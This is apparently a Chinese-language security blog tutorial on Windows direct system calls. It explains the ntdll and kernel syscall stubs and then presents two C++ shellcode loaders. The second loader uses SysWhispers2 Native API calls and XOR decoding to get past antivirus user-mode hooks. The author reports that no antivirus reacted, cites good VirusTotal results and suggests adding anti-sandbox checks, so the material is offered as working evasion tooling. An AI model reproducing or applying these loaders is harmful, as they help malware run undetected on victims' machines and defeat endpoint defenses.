直接系统调用

什么是SysCall

 
在Windows中,进程处理体系被分为两种:用户模式和内核模式.
 

 
 
Notepad++ 随便写一个文件我们查看一下这个操作
 

 
其中 U 代表是用户层, K 代表的是内核层,我们可以看见创建文件这个操作首先是调用 ntdll!NtCreateFile 之后切换为内核层的 ntoskrnl.exe!NtCreateFile 处理
 
可见 ntdll.dll 里面导出的是 Windows 的原生API, ntoskrnl 里是对其的实现(内核API).
 
 
在 WinDbg 中查看一下 ntdll!NtCreateFile 的汇编指令
 

mov     r10,rcx
mov     eax,55h
syscall
ret

 
其中 55h 是 ZwCreateFile 的调用号
 
值得一提的是很多系统的调用号是不同的,可以在这里面做下参考:
 
https://j00ru.vexillium.org/syscalls/nt/64/
 

SysCall

 
还是从最开始的简单利用加载 ShellCode 来看
 

#include <iostream>
#include <Windows.h>
int main()
{
    DWORD dwThreadID;
    HANDLE handle;
    int shellcode_size;
    unsigned char buf[]="";
    shellcode_size = sizeof(buf);//
    char* shellcode = (char*)VirtualAlloc(NULL,shellcode_size,MEM_COMMIT,PAGE_EXECUTE_READWRITE);//申请内存页，大小为shellcode的大小,属性为 可读可写可执行
    CopyMemory(shellcode,buf,shellcode_size);//将Shellcode放进内存页
    handle = CreateThread(NULL,NULL,(LPTHREAD_START_ROUTINE)shellcode,NULL,NULL,&dwThreadID);//创建线程
    WaitForSingleObject(handle,INFINITE);//等待线程结束
    return 0;
}

 
跟踪一下Api试试看
 

 
可以看到 VirtualAlloc 底层调用的是 NtAllocateVirtualMemory ,而 CreateThread 调用的是 NtCreateThreadEx
 
其中 VirtualAlloc 以及 CreateThread 是比较敏感的Api,一般杀软对这种情况会做一个阈值处理,当特征达到一定数量后会作为病毒处理,因此我们可以通过直接系统调用,绕过杀软对用户层的 hook
 

使用SysWhispers2进行系统调用

 
ShellCode 请使用 x64 , X86 可以看下 https://github.com/mai1zhi2/SysWhispers2_x86
 
根据每个系统的不同,调用号也是不同的,我们可以根据前人的研究成果来更方便的进行学习
 
根据 Outflank 的 文章
 
我们可以根据 Native 的 API RtlGetVersion 来获取系统的版本
 

 
后面经过学习发现 Jackson 的 SysWhispers2 项目有更好的适用性,该项目采用了 modexp 的方法
 
先使用 SysWhispers2 生成我们的文件
 

 
 
将这些文件放入我们的项目
 

 
用 NtAllocateVirtualMemory 和 NtWriteVirtualMemory 以及 NtCreateThreadEx 这些Native的API替换成我们加载ShellCode的常规操作(申请内存、拷贝内存、创建线程)
 
测试代码为
 

#include <iostream>
#include <Windows.h>
#include "syscalls.h"

int main()
{
    DWORD dwThreadID;
    HANDLE handle;
    int shellcode_size;
    unsigned char buf[] = "";
    for (int test = 0; test < sizeof(buf); test++) {
        buf[test] = buf[test] ^ 10;
    }

    HANDLE hProc = GetCurrentProcess();
    PVOID ptr = NULL;
    HANDLE thandle = NULL;
    shellcode_size = sizeof(buf);//
    SIZE_T allocation_sizes = sizeof(buf);
    NTSTATUS NTAVM = NtAllocateVirtualMemory(hProc, &ptr, 0, (PSIZE_T)&shellcode_size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    NTSTATUS NTAVV = NtWriteVirtualMemory(hProc,ptr,buf, allocation_sizes,0);
    NTSTATUS ct = NtCreateThreadEx(&thandle,GENERIC_EXECUTE,NULL,hProc,ptr, NULL, FALSE, 0, 0, 0, NULL);
    WaitForSingleObject(thandle, INFINITE);
    free(ptr);
    // char* shellcode = (char*)VirtualAlloc(NULL, shellcode_size, MEM_COMMIT, PAGE_EXECUTE_READWRITE);//申请内存页，大小为shellcode的大小,属性为 可读可写可执行
   // CopyMemory(shellcode, buf, shellcode_size);//将Shellcode放进内存页
    
    //handle = CreateThread(NULL, NULL, (LPTHREAD_START_ROUTINE)shellcode, NULL, NULL, &dwThreadID);//创建线程
    //WaitForSingleObject(handle, INFINITE);//等待线程结束
    return 0;
}

 

 
一众杀软均无反应
 
看下API的调用情况
 
发现调用的基本都是 Native 的 API
 

 
Vt检出良好,加几个反沙箱之类的估计就更完美了
 

其他

 
SysWhispers2 不支持 x86 的架构,国内有师傅改了一下，使其支持 x86
 
https://github.com/mai1zhi2/SysWhispers2_x86 (有问题的话记得看Issues)
 

参考资料

https://github.com/jthuraisamy/SysWhispers
https://y4er.com/post/using-csharp-to-syscall/
https://github.com/outflanknl/Dumpert
https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/ntifs/nf-ntifs-ntallocatevirtualmemory
https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualallocex
https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-writeprocessmemory
https://mp.weixin.qq.com/s/2Gui2tVOkG4JIRQe7gMP0A
https://lengjibo.github.io/syscall/
http://www.codewarrior.cn/ntdoc/winnt/mm/NtWriteVirtualMemory.htm